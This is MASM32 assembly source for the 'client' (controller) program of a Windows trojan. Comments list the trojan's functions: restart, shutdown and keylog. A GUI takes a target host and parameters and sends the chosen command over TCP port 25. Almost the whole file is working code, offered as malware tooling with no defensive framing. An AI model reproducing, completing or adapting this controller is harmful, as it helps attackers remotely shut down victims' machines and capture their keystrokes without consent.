Client Source
.386
.model flat,stdcall
option casemap:none
EditSl PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
PushButton PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListBox PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
AddItems PROTO :DWORD
lstWndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
inv equ invoke
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shell32.inc
include \masm32\include\wsock32.inc
include \masm32\include\gdi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\gdi32.lib
.const
X_Win equ 300
Y_Win equ 300
port equ 25
WM_SOCKET equ WM_USER+100
ICON equ 1
BMP equ 10
BTN_SEND equ 101 ; push button
EDIT_IP equ 111 ; edit box
EDIT_PAR1 equ 112
EDIT_PAR2 equ 113
EDIT_HIST equ 114
LST_FUNC equ 121 ; list box
; trojan functions
RESTART equ 0
SHUTDOWN equ 1
KEYLOG equ 2
.data
; hWnd shit ..
szClassName db "Win32ASM_Class", 0
szAppName db "Client", 0
wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, NULL, \
NULL, NULL, NULL, NULL, NULL, NULL, offset szClassName, NULL>
; window classes
btnClass db "BUTTON", 0
slEdit db "EDIT", 0
lstClass db "LISTBOX", 0
; button text
btnSend db "Send", 0
IP db "localhost", 0
Par1 db "Parameter 1", 0
Par2 db "Parameter 2", 0
Hist db "Here goes the 'history'", 0
; strings
ItemBuffer db 128 dup (0)
include list.asm
; network msgs
Function db 0
.data?
hInstance dd ?
hwnd dd ?
hBmp dd ?
X_Pos dd ?
Y_Pos dd ?
msg MSG <?>
; network
sin sockaddr_in <?>
hSocket dd ?
wsadata WSADATA <?>
bRead dd ?
bHost dd ?
bSend dd ?
available_data dd ?
hlstBox dd ?
lpfnWndProc dd ?
.code
start:
inv WSAStartup, 101h, offset wsadata
inv GetModuleHandle, NULL
mov hInstance, eax
mov wc.hInstance, eax
inv LoadIcon, hInstance, ICON
mov wc.hIcon, eax
mov wc.hIconSm, eax
inv LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax
inv GetStockObject, BLACK_BRUSH
mov wc.hbrBackground, eax
inv RegisterClassEx, offset wc
inv GetSystemMetrics, SM_CXSCREEN ; Calculate Screen center
shr eax, 1
sub eax, X_Win / 2
mov X_Pos, eax
inv GetSystemMetrics, SM_CYSCREEN
shr eax, 1
sub eax, Y_Win / 2
mov Y_Pos, eax
inv CreateWindowEx, NULL, offset szClassName, offset szAppName, WS_OVERLAPPEDWINDOW, \
X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
mov hwnd, eax
inv ShowWindow, eax, SW_SHOW
inv UpdateWindow, hwnd
; Window Loop
.while TRUE
inv GetMessage, offset msg, NULL, 0, 0
.break .if (!eax)
inv TranslateMessage, offset msg
inv DispatchMessage, offset msg
.endw
inv ExitProcess, msg.wParam
; Window Proc
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.if uMsg == WM_DESTROY
.if hSocket != 0
inv closesocket, hSocket
.endif
inv WSACleanup
inv PostQuitMessage, NULL
.elseif uMsg == WM_CREATE
;########################
;
; Create all buttons etc.
;
;########################
; inv CreateRoundRectRgn, 0, 0, X_Win, Y_Win, 30, 30
; inv SetWindowRgn, hWnd, eax, TRUE
inv EditSl, offset IP, 10, 10, 130, 25, hWnd, EDIT_IP, 0
inv EditSl, offset Par1, 10, 45, 130, 25, hWnd, EDIT_PAR1, 0
inv EditSl, offset Par2, 10, 80, 130, 25, hWnd, EDIT_PAR2, 0
inv EditSl, offset Hist, 10, 150, 270, 110, hWnd, EDIT_HIST, ES_READONLY
inv PushButton, offset btnSend, hWnd, 40, 115, 80, 25, BTN_SEND
inv ListBox, NULL, hWnd, 150, 10, 130, 130, LST_FUNC
mov hlstBox, eax
inv SetWindowLong, hlstBox, GWL_WNDPROC, lstWndProc
mov lpfnWndProc, eax
inv AddItems, hlstBox
inv SendMessage, hlstBox, LB_SETCURSEL, 0, 0
.elseif uMsg == WM_COMMAND
;##########################################################################
;
; This function tries to get the hostname and connect's (if possible) to it
;
;##########################################################################
.if wParam == BTN_SEND
.if hSocket != 0
inv closesocket, hSocket
mov hSocket, 0
.endif
inv socket, PF_INET, SOCK_STREAM, 0
mov hSocket, eax
mov sin.sin_family, AF_INET
inv htons, port
mov sin.sin_port, ax
inv WSAAsyncSelect, hSocket, hWnd, WM_SOCKET, FD_CLOSE + FD_CONNECT + FD_READ
inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, 1000
mov bHost, eax
inv GetDlgItemText, hWnd, EDIT_IP, bHost, 999
inv gethostbyname, bHost
.if eax != NULL
mov eax, [eax + 12]
mov eax, [eax]
mov eax, [eax]
.else
inv inet_addr, bHost
.endif
mov sin.sin_addr, eax
inv connect, hSocket, offset sin, SIZEOF sin
inv GlobalFree, bHost
;#######################################################################
;
; This function allocates a buffer, creates a network paket and sends it
;
;#######################################################################
inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, 300
mov bSend, eax
mov edi, eax
mov al, Function
stosb
inc edi
push edi
inv GetDlgItemText, hWnd, EDIT_PAR1, edi, 100
pop edi
dec edi
stosb
add edi, eax
inc edi
push edi
inv GetDlgItemText, hWnd, EDIT_PAR2, edi, 100
pop edi
dec edi
stosb
add edi, eax
mov eax, edi
sub eax, bSend
inv send, hSocket, bSend, eax, 0
inv GlobalFree, bSend
inv closesocket, hSocket
mov hSocket, 0
.endif
.else
inv DefWindowProc, hWnd, uMsg, wParam, lParam
ret
.endif
xor eax,eax
ret
WndProc endp
; #########################################################################
EditSl proc szMsg:DWORD,a:DWORD,b:DWORD,
wd:DWORD,ht:DWORD,hParent:DWORD,ID:DWORD,mieps:DWORD
mov eax, WS_VISIBLE or WS_CHILDWINDOW or ES_AUTOHSCROLL or ES_NOHIDESEL
or eax, mieps
invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR slEdit,szMsg,
eax, a, b, wd, ht, hParent, ID, hInstance, NULL
ret
EditSl endp
; ########################################################################
PushButton proc lpText:DWORD,hParent:DWORD,
a:DWORD,b:DWORD,wd:DWORD,ht:DWORD,ID:DWORD
invoke CreateWindowEx,0,
ADDR btnClass,lpText,
WS_CHILD or WS_VISIBLE,
a,b,wd,ht,hParent,ID,
hInstance,NULL
ret
PushButton endp
; ########################################################################
ListBox proc lpText:DWORD,hParent:DWORD,a:DWORD,b:DWORD,wd:DWORD,ht:DWORD,ID:DWORD
invoke CreateWindowEx,0, ADDR lstClass, lpText,
WS_CHILD or WS_VISIBLE or WS_VSCROLL or \
LBS_HASSTRINGS or LBS_NOINTEGRALHEIGHT or LBS_DISABLENOSCROLL, \
a,b,wd,ht,hParent,ID,hInstance,NULL
ret
ListBox endp
; #########################################################################
AddItems proc hWnd:DWORD
mov esi, offset item000000
mov edi, offset ItemBuffer
@@:
lodsb
cmp al, 0 ; get zero
je SubLp ; write to list
stosb
jmp @B
SubLp:
stosb ; write terminator
inv SendMessage, hWnd, LB_ADDSTRING, 0, ADDR ItemBuffer
lodsb
cmp al, 0 ; check for second zero
je @F ; exit if found
mov edi, offset ItemBuffer ; reset to start of buffer
stosb ; write test byte to it
jmp @B
@@:
ret
AddItems endp
; #########################################################################
lstWndProc proc hWin :DWORD, uMsg :DWORD, wParam :DWORD, lParam :DWORD
LOCAL IndexItem :DWORD
LOCAL Buffer[32] :BYTE
.if (uMsg == WM_LBUTTONDBLCLK) || (uMsg == WM_LBUTTONUP) || (uMsg == WM_CHAR)
inv SendMessage, hWin, LB_GETCURSEL, 0, 0
.if al != LB_ERR
mov Function, al
.endif
.endif
inv CallWindowProc, lpfnWndProc, hWin, uMsg, wParam, lParam
ret
lstWndProc endp
end start